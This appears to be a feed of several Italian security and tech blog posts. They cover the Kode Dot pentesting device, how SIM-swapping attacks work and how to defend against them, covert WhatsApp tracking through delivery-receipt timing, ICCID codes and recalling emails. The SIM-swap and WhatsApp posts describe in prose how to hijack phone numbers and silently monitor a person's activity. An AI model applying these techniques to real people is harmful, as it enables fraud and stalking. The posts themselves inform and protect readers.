Il caso analizzato da Zoziel Pinto Freire è un piccolo gioiello didattico, che consiglio a tutti di leggere nella versione integrale (qui il link originale su Security Affairs) per chi volesse vedere screenshot, IoC e dettagli di esecuzione live in macchina virtuale. Per quanto mi riguarda, la morale è sempre la stessa: nel 2026 la differenza tra un’immagine e un malware può essere semplicemente il modo in cui guardiamo il file.

L'articolo Malware nascosto in un finto JPG: analisi forense di un attacco moderno proviene da Luca Mercatanti.

Caratteristiche principali e funzionalità avanzate di Kode Dot

Kode Dot si basa su un microcontrollore ESP32-S3 dual-core, dotato di 32MB di memoria flash e 8MB di PSRAM, che offre potenza di calcolo elevata e ampia capacità di memoria per gestire applicazioni complesse. Questo hardware di fascia alta rende Kode Dot un dispositivo performante, in grado di supportare multitasking e funzionalità avanzate, tra cui l’utilizzo dei modelli LLM per il coding (sì, avete letto bene: Kode Dot permetterà di scrivere codice mediante l’utilizzo dell’AI).
Rispetto al Flipper, è dotato di un display AMOLED a colori da 2,13 pollici con risoluzione 392×410 pixel, che garantisce immagini nitide e una user experience molto più coinvolgente.

Dal punto di vista della connettività, Kode Dot integra nativamente NFC e RFID per la lettura e l’emulazione di tag a 125 kHz, insieme a un trasmettitore e ricevitore a infrarossi per controllare dispositivi compatibili. A completare il pacchetto hardware, avendo il Kickstarter superato i 2 milioni di Dollari, è stato inserito all’interno del dispositivo un modulo (prima accessorio) che estende le capacità radio con supporto a Wi-Fi dual-band (2.4/5 GHz), frequenze Sub-GHz e protocolli NRF24, consentendo sniffing, analisi e pentesting avanzato.

Tra i sensori integrati spiccano un accelerometro a 9 assi e un microfono MEMS, che ampliano le possibilità di interazione e rilevamento ambientale. L’alimentazione è affidata a una batteria Li-Po da 500mAh, gestita da un controller energetico BQ25896 che ottimizza autonomia e sicurezza di ricarica. Per migliorare l’esperienza utente, è presente un motore di vibrazione che fornisce feedback tattile immediato.

Il software si basa su kodeOS, un sistema operativo personalizzato e modulare che gestisce app e funzionalità in modo fluido. La programmazione è estremamente flessibile, con supporto per ambienti consolidati come Arduino IDE, PlatformIO e ESP-IDF, permettendo agli sviluppatori di creare applicazioni su misura. Infine, Kode Dot integra comandi vocali AI grazie a modelli come OpenAI ChatGPT e Google Gemini, offrendo assistenza intelligente direttamente dal dispositivo.

Vantaggi di Kode Dot rispetto al Flipper Zero e altri strumenti simili

Kode Dot rappresenta molto più di un semplice upgrade rispetto al Flipper Zero: è un salto tecnologico significativo. Il display AMOLED a colori di alta qualità porta un’interfaccia utente più ricca, leggibile e personalizzabile, superando la limitazione del tradizionale schermo monocromatico di Flipper Zero.
Il microcontrollore ESP32-S3 dual-core, con maggiore potenza e memoria, consente l’esecuzione di applicazioni più complesse e multitasking efficiente, migliorando le prestazioni complessive. Dal punto di vista software, kodeOS introduce un sistema operativo modulare che integra intelligenze artificiali come OpenAI ChatGPT e Google Gemini, offrendo funzionalità vocali e assistenza intelligente del tutto assenti nel Flipper Zero.

Costi e spedizione

Nel momento in cui scrivo, ho acquistato un Kode Dot con scocca trasparente (edizione limitata ai finanziatori su Kickstarter) al costo di 149 Dollari e la spedizione è prevista per Giugno 2026. Al momento, però, non vi sono novità in merito alla produzione. Da risolvere sarà anche la questione relativa al modulo esterno per il “Wi-Fi Hacking”: molti utenti che avevano acquistato il modulo WiFi avanzato, si ritrovano ad aver sostenuto una spesa inutile, essendo queste funzioni state integrate direttamente all’interno del Kode Dot senza necessità di accessori esterni.

L'articolo Kode Dot: un hacking tool successore del Flipper Zero proviene da Luca Mercatanti.

In questa guida completa, cercherò di spiegare nel dettaglio cos’è il Sim Swapping, come avvengono gli attacchi, quali rischi comporta e come riconoscerne i segnali. Infine, cercheremo di capire quali possano essere delle strategie efficaci e consigli pratici per prevenire questo tipo di frode e reagire tempestivamente in caso di attacco.

Cos’è il Sim Swapping e come funziona

Definizione e meccanismo di funzionamento del Sim Swapping

Il Sim Swapping, o “scambio della SIM”, è un attacco informatico che consiste nel trasferimento fraudolento del numero di telefono su una nuova scheda SIM controllata dal truffatore. In pratica, il criminale convince l’operatore telefonico a disattivare la SIM originale e ad attivare una nuova SIM con lo stesso numero, che poi inserisce nel proprio dispositivo.

Il numero di telefono è un elemento chiave per la sicurezza digitale, perché spesso viene usato come secondo fattore di autenticazione (2FA) per accedere a servizi online come email, social media, conti bancari e wallet di criptovalute. Attraverso l’accesso ai messaggi SMS o alle chiamate indirizzate al tuo numero, l’attaccante può intercettare codici temporanei necessari per completare l’accesso, aggirando così la protezione offerta dall’autenticazione a due fattori basata sugli SMS.

Gli operatori telefonici, soggetti a regolamentazioni di enti come Agcom, gestiscono la portabilità del numero e la sostituzione delle SIM. Purtroppo, in alcuni casi, le procedure di verifica dell’identità sono insufficientemente rigorose o vulnerabili, permettendo ai truffatori di ottenere una nuova SIM a loro nome usando documenti falsificati o attraverso tecniche di ingegneria sociale (social engineering).

Come avviene un attacco di Sim Swapping: tecniche e modalità

Gli attacchi di Sim Swapping si basano prevalentemente su tecniche di social engineering, ovvero manipolazioni psicologiche che inducono gli operatori telefonici a rilasciare la SIM a persone non autorizzate. L’attaccante, in linea di principio, si finge il titolare della SIM, convincendo il personale dell’operatore a effettuare la portabilità del numero su una nuova SIM.

• Documenti falsificati: spesso vengono prodotti documenti d’identità contraffatti per supportare la richiesta di cambio SIM. Con l’utilizzo dell’intelligenza artificiale o di strumenti ormai alla portata di chiunque, è possibile produrre una copia esatta di documenti reali.
• Complici interni: in alcuni casi, dipendenti degli operatori telefonici collaborano con i truffatori facilitando la frode.
• Sfruttamento di vulnerabilità di rete: il protocollo SS7, utilizzato per instradare chiamate e SMS, presenta falle che permettono di intercettare comunicazioni senza sostituire fisicamente la SIM.

Vulnerabilità del protocollo SS7

Oltre alla richiesta di una nuova SIM fisica con le tecniche di cui sopra abbiamo discusso, è possibile anche che l’attacco di SIM Swapping avvenga sfruttando falle di sicurezza intrinseche nei protocolli di segnalazione utilizzati per il funzionamento delle reti di telefonia mobile.

In particolare, le reti cellulari si basano su protocolli di segnalazione pensati storicamente per garantire interoperabilità tra operatori a livello globale, ma non progettati con un modello di sicurezza “zero trust”. Uno degli esempi più noti è il protocollo SS7 (Signaling System No. 7), ancora oggi utilizzato, seppur affiancato da tecnologie più recenti, per la gestione di operazioni critiche come l’instradamento delle chiamate, degli SMS e la gestione della mobilità dell’utente tra celle e reti diverse. SS7 nasce in un’epoca in cui si dava per scontato che solo soggetti fidati (gli operatori) avessero accesso alla rete di segnalazione; questo presupposto, oggi, non è più valido.

Un attaccante che riesca ad accedere, direttamente o indirettamente, alla rete di segnalazione può interrogare il sistema per ottenere informazioni sulla posizione dell’utente, intercettare SMS o reindirizzare il traffico di segnalazione verso nodi controllati. In questo scenario, il numero di telefono della vittima può essere “dirottato” logicamente senza che vi sia una vera e propria emissione di una nuova SIM fisica.
Dal punto di vista dell’utente, il risultato è analogo a quello di un SIM swap classico: il telefono perde improvvisamente la rete, mentre l’attaccante inizia a ricevere chiamate e messaggi, inclusi i codici OTP inviati via SMS.

Anche i protocolli successivi, come Diameter, introdotti per le reti LTE e 5G, pur migliorando alcuni aspetti di sicurezza, non sono immuni da configurazioni errate, implementazioni incomplete o esposizioni indebite di interfacce di segnalazione. In presenza di tali condizioni, un soggetto malevolo può sfruttare l’accesso alla segnalazione per forzare eventi di aggiornamento dell’utenza, modificare temporaneamente l’associazione tra numero e profilo di rete, o abusare delle procedure di autenticazione tra reti visitate e rete “home”.

Segnali e sintomi di un attacco di Sim Swapping

Perdita improvvisa di servizio mobile

Il segnale più evidente di un attacco di Sim Swapping è la perdita improvvisa di segnale o la disconnessione dal servizio mobile, anche se il telefono non presenta problemi tecnici. Questo avviene perché la tua SIM è stata sostituita e il numero è attivo su un altro dispositivo.

Altri segnali di allarme includono addebiti o transazioni non riconosciute sul conto telefonico o bancario, SMS o chiamate di conferma per operazioni che non hai effettuato, e notifiche di modifiche password o accessi non autorizzati ai tuoi servizi finanziari.

Come proteggersi dal Sim Swapping: strategie e misure di sicurezza

Autenticazione a due fattori: preferire app o hardware token

L’autenticazione a due fattori basata sugli SMS è vulnerabile al Sim Swapping. Per questo motivo, ti consigliamo di utilizzare app di autenticazione come Google Authenticator o Authy, che generano codici temporanei direttamente sul dispositivo, senza passare tramite la rete mobile.

Per una protezione ancora più robusta, è possibile adottare dispositivi hardware come YubiKey o Google Titan Security Keys, che richiedono la presenza fisica del token per autorizzare l’accesso agli account. Questi strumenti rappresentano una barriera efficace contro gli attacchi remoti come il Sim Swapping, anche se possono risultare problematici da usare, in quanto è richiesta la disponibilità fisica di un dispositivo hardware per l’autenticazione.

Impostare PIN e blocchi di portabilità con l’operatore

Molti operatori telefonici offrono la possibilità di impostare un PIN di sicurezza e blocchi specifici per la portabilità della SIM. Queste misure rallentano o impediscono la sostituzione fraudolenta, perché senza il PIN corretto non è possibile effettuare la portabilità o la sostituzione della SIM.

Come reagire se si è vittima di Sim Swapping

Azioni immediate: contattare l’operatore e cambiare password

Se sospetti di essere vittima di Sim Swapping, contatta immediatamente il tuo operatore telefonico per bloccare la SIM fraudolenta e ripristinare la tua. L’operatore può fermare qualsiasi nuova portabilità e mettere in sicurezza il tuo numero.
Contestualmente, cambia le password di tutti gli account collegati al tuo numero. Inutile dire di scegliere password forti e uniche per ogni servizio per limitare i danni e prevenire ulteriori accessi non autorizzati.

L'articolo SIM Swapping: la guida completa e come difendersi proviene da Luca Mercatanti.

Grazie all’utilizzo di messaggi appositamente costruiti (come reazioni, modifiche o cancellazioni), è possibile forzare la generazione di ricevute di consegna invisibili all’utente e, analizzando il tempo di risposta (RTT) di queste ricevute, un attaccante può ottenere informazioni utili, ad esempio all’interno di un contesto OSINT, tra cui:

• se lo schermo del telefono è acceso o spento
• se l’app di messaggistica è in primo piano
• gli orari di attività e inattività quotidiani
• la presenza e lo stato di più dispositivi collegati allo stesso account (smartphone, web client, desktop)

Se a primo avviso questo potrebbe sembrare un problema di privacy “da poco”, riflettendoci, è possibile in realtà tracciare con estrema precisione il comportamento degli utenti in relazione all’utilizzo dei loro smartphone, conoscendo semplicemente il numero di telefono. Realizzando infatti un semplice script, è possibile inviare, ad intervalli regolari ed in modo automatizzato, dei messaggi “invisibili” che, analizzati secondo quanto riportato nel paper, permettono di comprendere la relazione tra l’utente e lo smartphone.

Lo screenshot qui sopra riportato (il quale fa riferimento alla Figura 1 nel documento originale) mostra in modo molto chiaro il cuore della vulnerabilità descritta nel paper.
Gli autori hanno misurato il Round-Trip Time (RTT) delle delivery receipts di WhatsApp su iPhone, cioè il tempo che passa tra l’invio di un messaggio “silenzioso” e la ricezione della conferma di consegna dal dispositivo della vittima. La misura è stata fatta con una frequenza di 1 ping al secondo.

Il grafico mette a confronto due stati del telefono della vittima:

• Screen On (schermo acceso)
• Screen Off (schermo spento)

Sull’asse orizzontale c’è il tempo di risposta in millisecondi, su quello verticale la probabilità (distribuzione statistica degli RTT osservati).
Quello che emerge è una separazione netta delle due distribuzioni:

• Quando lo schermo è acceso, i delivery receipt tornano molto velocemente, quasi sempre sotto 1 secondo. Questo accade perché il sistema operativo mantiene CPU, rete e app in uno stato attivo, rispondendo immediatamente ai pacchetti.
• Quando lo schermo è spento, i tempi di risposta aumentano in modo evidente, con RTT superiori a 1 secondo, spesso tra 1.5 e 2.5 secondi. Qui entrano in gioco i meccanismi di risparmio energetico (sleep, deep sleep, background scheduling).

Il punto fondamentale è che questa differenza è sistematica e stabile, non casuale. Un attaccante che osserva solo i tempi di ritorno delle ricevute può quindi stabilire con ottima affidabilità se il telefono della vittima è:

• in uso attivo
• inattivo / in standby

Il tutto senza inviare messaggi visibili, senza notifiche e senza che la vittima possa accorgersene.
Dal punto di vista pratico, questa figura dimostra che i delivery receipt diventano un sensore remoto dello stato del dispositivo. Ripetendo la misura nel tempo, si può ricostruire:

• cambiamenti improvvisi di attività
• orari di utilizzo del telefono
• pattern giornalieri (sonno, lavoro, pause)

Quali messaggi vengono utilizzati per tracciare gli utenti

Nel capitolo “Delivery Receipt Sources” gli autori del paper spiegano da quali azioni concrete nascono le delivery receipt e, soprattutto, quali di queste azioni sono sfruttabili come canale laterale “silenzioso” per monitorare un utente senza che se ne accorga.
Il punto di partenza è chiarire che non solo i messaggi di testo generano una delivery receipt. Gli autori testano in modo sistematico diverse azioni supportate dai client di WhatsApp, Signal e Threema, osservando due aspetti per ciascuna:

1. se l’azione genera una delivery receipt verso il mittente
2. se l’azione produce una notifica visibile per il destinatario

Le azioni analizzate sono quattro:

• invio di un messaggio normale
• modifica di un messaggio già inviato
• reazione a un messaggio (emoji)
• cancellazione di un messaggio (“delete for everyone”)

Il risultato chiave è che WhatsApp e Signal inviano delivery receipt anche per reazioni, modifiche e cancellazioni, mentre Threema limita le ricevute ai soli messaggi normali. Questo dettaglio è cruciale perché molte di queste azioni non generano notifiche sul dispositivo della vittima.
In particolare, modificare o cancellare un messaggio non avvisa l’utente nella maggior parte dei casi, e quindi diventa un vettore perfetto per il tracciamento occulto.

Fingerprint del sistema operativo usato

Il paper non si limita a dimostrare come sia possibile utilizzare i “messaggi” di cui sopra per tracciare l’attività dell’utente, ma si spinge oltre: nel capitolo “Device OS Fingerprinting”, infatti, la tecnica descritta viene sfruttata per identificare la tipologia di smartphone/sistema operativo in uso dal destinatario.
Gli autori spiegano che WhatsApp e Signal gestiscono delivery e read receipts in modo diverso a seconda del sistema operativo e del tipo di client (Android, iOS, Web, Desktop, macOS, Windows).
Queste differenze sono osservabili da remoto analizzando come e in che ordine arrivano le ricevute, non il loro contenuto.

La Figura 8 del paper, qui sopra riportata, è il risultato di un attacco reale, in ambiente non controllato, usando solo delivery receipt silenziosi e senza alcuna interazione visibile con la vittima.
La figura mostra il tracciamento simultaneo di tre dispositivi appartenenti alla stessa persona:

1. Device[0] – smartphone principale
2. Device[1] – computer di casa (WhatsApp Web su Chrome, LAN cablata)
3. Device[9] – laptop di lavoro (client desktop WhatsApp su macOS, Wi-Fi)

L’attaccante è uno spooky stranger: non è nei contatti, non c’è una chat attiva, invia solo ping silenziosi ogni 2 secondi. Sull’asse orizzontale c’è il tempo reale, su quello verticale il RTT delle delivery receipt in millisecondi.
In particolar modo:

Smartphone (Device[0])
Dai tempi di risposta delle delivery receipt si capisce quando il telefono è su Wi-Fi, quando passa a LTE, quando è in chiamata e quando torna su Wi-Fi. Questo permette di ricostruire spostamenti e contesto d’uso (casa → uscita → ufficio) senza vedere nulla sul dispositivo.

Desktop di casa (Device[1])
RTT estremamente stabili indicano una connessione LAN. La scomparsa improvvisa delle ricevute mostra il momento esatto in cui il computer viene spento, quindi quando l’utente lascia casa.

Laptop di lavoro (Device[9])
Nessuna receipt finché il dispositivo è spento; all’accensione arrivano molte ricevute insieme. Il loro formato e ordine consentono di identificare un client desktop macOS collegato via Wi-Fi.re il dispositivo in anticipo.

Exploit pronto all’uso

Dal paper in questione è nato il tool “Device Activity Tracker” disponibile su GitHub, il quale permette, come anticipato all’inizio del presente articolo, di tracciare automaticamente il comportamento di un utente semplicemente conoscendone il numero di telefono ed in modo più o meno invisibile.

L'articolo Tracciare gli utenti su WhatsApp usando le ricevute di consegna proviene da Luca Mercatanti.

Cos’è l’ICCID e a cosa serve

L’ICCID, acronimo di Integrated Circuit Card Identifier, è un numero seriale unico composto da 18-22 cifre che identifica in modo univoco la tua scheda SIM.
Questo codice è essenziale perché permette di distinguere ogni SIM nel mondo, fungendo da “impronta digitale” per la scheda.

La struttura dell’ICCID comprende diversi blocchi: un identificatore dell’emittente (che indica il paese e l’operatore), il numero seriale della SIM e una cifra di controllo finale che serve a verificare la validità del codice. Grazie a questa composizione, l’ICCID è un codice affidabile e difficile da duplicare.

Questo codice è molto più di un semplice numero: viene utilizzato nelle operazioni di portabilità del numero, nell’attivazione e gestione della SIM, e contribuisce alla sicurezza della rete.
A differenza dell’IMSI, che identifica l’abbonato, o dell’IMEI, che identifica il dispositivo, l’ICCID identifica esclusivamente la SIM. Inoltre, l’ICCID sta assumendo un ruolo chiave anche nell’ambito dell’IoT e delle SIM M2M (machine-to-machine), dove la gestione sicura e remota dei dispositivi è fondamentale.

In poche parole, l’ICCID è il codice che ti permette di riconoscere la tua SIM in modo affidabile e di effettuare con sicurezza molte operazioni legate alla tua linea mobile.

Definizione e struttura dell’ICCID

L’ICCID è composto da tre parti principali:

• Identificatore emittente: le prime due cifre, solitamente “89”, indicano che si tratta di una scheda SIM. Seguono altre cifre che specificano il paese e l’operatore.
• Numero seriale della SIM: una sequenza di 15-19 cifre che rappresenta il codice univoco assegnato alla scheda.
• Cifra di controllo: l’ultima cifra, calcolata con l’algoritmo di Luhn, serve a verificare la correttezza dell’intero numero e a prevenire errori di trascrizione.

Ad esempio, un ICCID italiano tipico inizia con “8939”, seguito dal numero seriale e termina con la cifra di controllo. L’algoritmo di Luhn, usato anche per validare carte di credito, somma e verifica le cifre secondo uno schema preciso, assicurando che il codice non sia stato digitato erroneamente o falsificato.

Differenza tra ICCID, IMSI e IMEI

È facile confondere i codici ICCID, IMSI e IMEI, ma ognuno ha una funzione specifica:

• ICCID: identifica la scheda SIM, è il numero seriale unico della SIM stessa.
• IMSI (International Mobile Subscriber Identity): identifica l’abbonato o utente associato alla SIM, ed è usato dalla rete per autenticare la tua linea.
• IMEI (International Mobile Equipment Identity): identifica il dispositivo fisico, come il tuo smartphone o tablet.

Quando ti viene richiesto l’ICCID? Ad esempio, durante la portabilità del numero o per bloccare la SIM in caso di furto. L’IMSI è invece gestito dagli operatori per riconoscere l’utente sulla rete, mentre l’IMEI serve a bloccare o sbloccare il dispositivo. Capire queste differenze ti aiuterà a fornire sempre le informazioni corrette e a gestire al meglio la sicurezza del tuo telefono e della tua linea.

Come trovare l’ICCID sulla tua scheda SIM

Trovare il codice ICCID è più semplice di quanto pensi, ma i metodi variano a seconda del dispositivo che usi. Puoi recuperare l’ICCID in tre modi principali:

• Direttamente sulla scheda SIM fisica;
• Tramite le impostazioni del sistema operativo del tuo smartphone (Android o iOS);
• Usando app di terze parti, quando il codice non è visibile nelle impostazioni.

Su Android stock e Xiaomi, ad esempio, puoi trovare l’ICCID facilmente nelle impostazioni di sistema. Su iPhone hai un percorso diretto nelle impostazioni e puoi anche usare strumenti desktop come iTunes o Finder. Se il telefono non funziona o il codice non è visibile, la scheda fisica è sempre un metodo affidabile.

Metodi per dispositivi Android

Su smartphone Android “stock”, come Google Pixel, puoi trovare l’ICCID seguendo questo percorso: Impostazioni > Informazioni sul telefono > Stato SIM. Qui troverai il codice seriale SIM elencato insieme ad altre informazioni sulla rete.
Tuttavia, su alcuni brand come Huawei e Samsung, il codice ICCID potrebbe non essere visibile nelle impostazioni per motivi di design o sicurezza. In questi casi, puoi ricorrere a un’app di terze parti affidabile per leggere l’ICCID senza dover estrarre la SIM.

Su Xiaomi, invece, il percorso è leggermente diverso: Impostazioni > Info sistema > Stato SIM. Qui il codice è generalmente disponibile senza problemi.

Metodi per dispositivi iPhone e iOS

Su iPhone puoi trovare l’ICCID direttamente nelle impostazioni di sistema seguendo questo percorso: Impostazioni > Generali > Info. Scorrendo verso il basso, troverai il codice ICCID elencato chiaramente tra le informazioni della SIM.

Se hai una SIM integrata (eSIM), vedrai anche il codice EID, un identificatore digitale correlato ma diverso dall’ICCID.

In alternativa, puoi collegare il tuo iPhone a un PC o Mac e usare iTunes (su Windows o macOS Mojave e precedenti) oppure Finder (su macOS Catalina e successivi) per visualizzare l’ICCID. Questo metodo è utile se il telefono ha problemi o se preferisci controllare il codice da desktop.

Trovare l’ICCID sulla scheda fisica

L’ICCID è stampato direttamente sulla tua scheda SIM o sul supporto cartaceo che ti ha fornito l’operatore. Si tratta di un lungo numero di 19-22 cifre, spesso posizionato vicino al codice PIN o ad altri numeri identificativi.
Per riconoscerlo, cerca la sequenza più lunga di cifre stampate, che inizia solitamente con “89” e termina con la cifra di controllo. È importante annotare questo numero o fotografarlo e conservarlo in un luogo sicuro.

Perché l’ICCID è importante

L’ICCID è un codice fondamentale in molte operazioni legate alla tua scheda SIM. È indispensabile per:

• Attivare nuove SIM e associare correttamente la scheda al tuo numero;
• Effettuare la portabilità del numero da un operatore all’altro senza errori;
• Recuperare il codice PUK in caso di blocco della SIM;
• Bloccare o disabilitare la SIM in caso di furto o smarrimento del telefono, garantendo la sicurezza della tua linea.

Applicazioni pratiche: attivazione, assistenza e sicurezza

Quando attivi una nuova SIM, l’operatore ti chiederà spesso il codice ICCID per associare la scheda al tuo numero telefonico in modo univoco. Durante l’assistenza, ad esempio per recuperare il codice PUK o bloccare la SIM, l’ICCID è un elemento chiave per verificare la tua identità.
In caso di furto o smarrimento del telefono, fornendo l’ICCID all’operatore potrai bloccare la SIM, impedendo che venga usata da altri. Durante la portabilità del numero, il codice assicura che il passaggio tra operatori avvenga senza problemi.

Domande frequenti e approfondimenti

Differenze tra ICCID e altri identificatori

L’ICCID identifica la scheda SIM, mentre l’IMSI identifica l’abbonato e l’IMEI il dispositivo fisico. Il codice EID, infine, è specifico per le eSIM, la SIM digitale integrata. Conoscere a cosa serve ciascun codice ti evita errori durante operazioni come la portabilità o l’assistenza, aiutandoti a fornire sempre il numero giusto al momento giusto.

Come interpretare e decodificare il numero ICCID

Il numero ICCID è suddiviso in blocchi con significati precisi:

• Le prime cifre indicano l’emittente e il paese;
• Le cifre centrali rappresentano il numero seriale della SIM;
• L’ultima cifra è la cifra di controllo, calcolata con l’algoritmo di Luhn, che verifica la correttezza del codice.

Questo algoritmo, usato anche per carte di credito, somma le cifre in modo specifico per garantire che il codice non sia errato o contraffatto. Per decodificare un ICCID puoi usare strumenti online o software dedicati, molto utili per professionisti o operatori.

L'articolo Guida Completa all’ICCID della scheda SIM: cos’è, come trovarlo ed a cosa serve proviene da Luca Mercatanti.

Conoscere a fondo le opzioni per annullare l’invio, i limiti tecnici e le strategie per evitare errori irreversibili è oggi un’abilità chiave. In queste righe scoprirai come agire subito, cosa puoi davvero aspettarti da ogni piattaforma e come prepararti per non andare mai più nel panico dopo un click di troppo.

Come funziona l’annullamento di un’email ed i limiti tecnici

L’idea che un’email possa sparire come per magia dal server del destinatario è affascinante, ma la realtà è molto più intricata. Quando premi “Invia”, il messaggio viene duplicato: una copia resta nella tua “Posta inviata”, l’altra viene transitata attraverso server intermedi fino a giungere nella casella del destinatario, spesso in frazioni di secondo.

Alcuni provider offrono strumenti e finestre temporali precise, ma la certezza della sparizione totale della mail inviata rimane un miraggio, soprattutto all’esterno di circuiti proprietari e controllati come Microsoft Exchange.

Fattori che rendono l’annullamento impossibile (server, notifiche, lettura offline)

I limiti del periodo di annullamento dell’invio e della procedura di richiamo sono molteplici e tecnici: basta una sincronizzazione rapida tra server o che il destinatario abbia già visualizzato una notifica o un’anteprima sul dispositivo perché il tentativo fallisca. Anche solo l’accesso offline, cioè la ricezione locale della mail senza connessione attiva, rende inutile il richiamo.

I ritardi del server, differenze tra client, utilizzo di servizi non compatibili – come la mancanza di circuiti Exchange (vedi Outlook) – o semplicemente la prontezza del destinatario nel leggere la posta, sono tutte incognite che giocano contro una correzione efficace.
Il margine di manovra, insomma, è davvero ridotto e richiede di agire con lucidità e rapidità.

Gmail: come annullare l’invio (web e app) — impostazione e passaggi

La filosofia di Gmail punta sulla prevenzione piuttosto che sul recupero: il provider in questione offre un vero periodo di annullamento dell’invio che può essere personalizzato.
L’azione non è retroattiva: se la finestra temporale è scaduta, la mail resta definitivamente nella Posta inviata e sul server destinatario.
Tuttavia, se imposti correttamente le opzioni, quell’inevitabile barra che appare dopo ogni invio può diventare la tua migliore alleata.

Abilitare periodo di annullamento su Gmail

Per avere il massimo controllo, accedi alle impostazioni dal computer, clicca sull’icona a ingranaggio e scegli “Visualizza tutte le impostazioni”. Nella scheda “Generali”, vai alla voce Periodo di annullamento dell’invio. Qui puoi scegliere tra 5, 10, 20 o 30 secondi: si tratta della finestra di tempo disponibile per agire dopo l’invio.

Ricorda di cliccare “Salva modifiche” prima di uscire. Solo così il valore selezionato sarà attivo e ti comparirà regolarmente la notifica utile dopo ogni invio. Su smartphone Android o iOS, la versione app offre un margine più ridotto – solo 5 secondi – ma azionabile in modo identico sulle successive conversazioni.

Dove appare il pulsante Annulla su web e mobile

Appena mandi una mail, sul web compare subito un riquadro in basso a sinistra: “Messaggio inviato”. Qui trovi il tasto “Annulla”, spesso affiancato da “Visualizza messaggio”, per un controllo immediato. Cliccando su “Annulla”, l’invio viene bloccato e il messaggio si riapre in bozza, pronto all’edizione o alla correzione degli errori.

Sull’app mobile, il pulsante “Annulla” si trova invece in basso a destra, con una barra visiva che scorre: il tempo di azione è più breve, ma può salvare da molti impicci nelle conversazioni quotidiane in mobilità.

Outlook: opzioni web e client — come richiamare e requisiti

Per chi lavora in ambienti professionali, Outlook offre una doppia via: una breve finestra di annullamento simile a quella di Gmail nella versione web e la possibilità di richiamare il messaggio attraverso il client desktop, ma solo in contesti aziendali strutturati.

Il funzionamento concreto dipende da quale versione utilizzi e dal sistema informatico dell’organizzazione: solo chi opera interamente su Microsoft Exchange o Microsoft 365 può beneficiare della seconda opzione.

Impostare Annulla invio in Outlook Web

Entrando nelle impostazioni (icona a ingranaggio), scegli “Visualizza tutte le impostazioni di Outlook” e vai su “Componi e rispondi”. Qui attivi il comando Annulla invio, scegliendo tra 5 e 10 secondi: questa è la tua finestra per bloccare la partenza dei messaggi su Outlook Web.

Dopo ogni invio, appare un pulsante in basso a sinistra per annullare all’ultimo secondo, molto simile all’interfaccia Gmail. Clicca pronto: il tempo scorre in fretta e superato il limite la possibilità si esaurisce.

Richiamo da client Outlook: requisiti Exchange/365 e risultato

Sul client desktop (Windows/macOS), i più esperti possono tentare la procedura di vero richiamo del messaggio. Occorre che mittente e destinatario siano interni alla stessa organizzazione Microsoft Exchange o Microsoft 365: con servizi esterni, la funzione è totalmente inefficace.

La procedura parte dalla “Posta inviata”: apri la mail, vai su “…”, poi “Azioni” e scegli “Richiama il messaggio”. Le opzioni prevedono l’eliminazione o la sostituzione del messaggio originale (utile se occorre inviare una versione corretta). Tieni conto però che il destinatario può ricevere una notifica dell’azione e che il richiamo funziona solo fintanto che la mail non viene letta.

Apple Mail: annullare invio su macOS e iOS — versioni e impostazioni

Apple Mail ha introdotto la possibilità di annullare l’invio nella sua ultima generazione. Per chi usa macOS Ventura o versioni successive, oppure iOS 16 e oltre, la funzione è ora parte integrante della gestione contemporanea della corrispondenza digitale.

L’azione, però, è soggetta a limiti specifici dettati sia dalla versione del sistema operativo sia dal margine temporale disponibile.

Compatibilità (macOS Ventura, iOS 16+) e finestra di default

L’annullamento immediato è offerto solo a chi lavora su macOS Ventura, le sue versioni più recenti e su dispositivi mobile aggiornati a iOS 16 e superiori. Di default la finestra è di 10 secondi: piuttosto rapida, ma sufficiente a impedire errori macroscopici.

Dopo aver inviato, in basso compare la barra “Annulla”, che blocca l’operazione e rende nuovamente disponibile il testo originale. Se invece usi versioni precedenti, questa opportunità purtroppo non esiste e occorrerà agire in modo diverso.

Come estendere tempo per annullare (fino a 30s)

Per chi preferisce un po’ più di margine, è possibile modificare l’impostazione standard: nel menu delle impostazioni di Mail vai sulla voce “Tempo per annullare l’invio” e regola secondo la tua esigenza, scegliendo fino a 30 secondi.

Basta un controllo rapido sui settaggi per sapere con certezza se puoi permetterti di respirare un attimo in più dopo ogni click.

Quando l’annullamento non esiste: Libero, ProtonMail, Tutanota, Thunderbird, Yahoo

Non tutti i servizi offrono strumenti avanzati. Tra i nomi più noti, alcuni pongono limiti tecnici generali e costringono a strategie alternative: agire sulla prevenzione, ricorrere a funzioni come l’autodistruzione o aggiungere componenti per ritardare l’invio.

Servizi senza richiamo e alternative disponibili

Libero Mail non permette alcun richiamo del messaggio: una volta inviata, la mail non può più essere recuperata. Lo stesso vale per Yahoo Mail: qui puoi solo attivare una risposta automatica di tipo “Fuori sede” per limitare eventuali danni, ma la correzione post-invio non esiste.

Anche Thunderbird non offre la funzione nativa: chi desidera un po’ di sicurezza in più deve affidarsi a plugin di terze parti per simularla o impostare un ritardo server. Le piattaforme crittografate come ProtonMail e Tutanota escludono tecnologicamente ogni forma di richiamo: qui la privacy del destinatario è inviolabile e l’unica contromisura è impostare la scadenza automatica delle email (expiry o autodistruzione).

Strumenti alternativi: scadenze, ritardi invio, risposte automatiche

• Imposta un invio ritardato, quando il servizio lo consente: avrai minuti o ore per correggere in bozza e bloccare eventuali errori.
• Scegli la scadenza automatica, se disponibile: su ProtonMail e Tutanota puoi far sì che il messaggio si autodistrugga dopo un certo periodo, riducendo danni a lungo termine.
• Attiva una risposta automatica per giustificare i contenuti errati o chiederne la cancellazione – soluzione estrema ma a volte migliore del silenzio.
• Contatta direttamente il destinatario e chiedi di eliminare la mail: con un tono trasparente puoi spesso mitigare l’imbarazzo e prevenire equivoci peggiori.

Notifiche al destinatario, copie sui server, limiti temporali

Quando avvii un richiamo, il destinatario può ricevere un avviso automatico: la trasparenza è obbligata. Anche se la cancellazione va a buon fine, le anteprime o le notifiche push potrebbero comunque aver già mostrato un estratto del testo.

La presenza di server intermedi significa che restano tracce della comunicazione: la finestra temporale (tempo per annullare l’invio) va da 5 a 30 secondi a seconda del servizio e dello strumento, poi ogni tentativo diventa vano.

Impostare invio ritardato e controlli pre-invio

• Imposta sempre l’invio ritardato quando possibile: questa semplice opzione ti regala minuti d’anticipo per ripensamenti.
• Esegui un doppio controllo su destinatari (A, Cc, Ccn) e allegati: prevenire è la regola d’oro per evitare errori.
• Usa il campo Ccn per proteggere la privacy nei messaggi a gruppi numerosi, e il Cc solo quando i destinatari devono essere a conoscenza ma non agire.
• Considera la formazione continua sulle best practice dell’etichetta digitale in azienda: errori sistemici possono essere evitati solo con l’abitudine e l’attenzione costante.

L'articolo Annullare un’email inviata proviene da Luca Mercatanti.

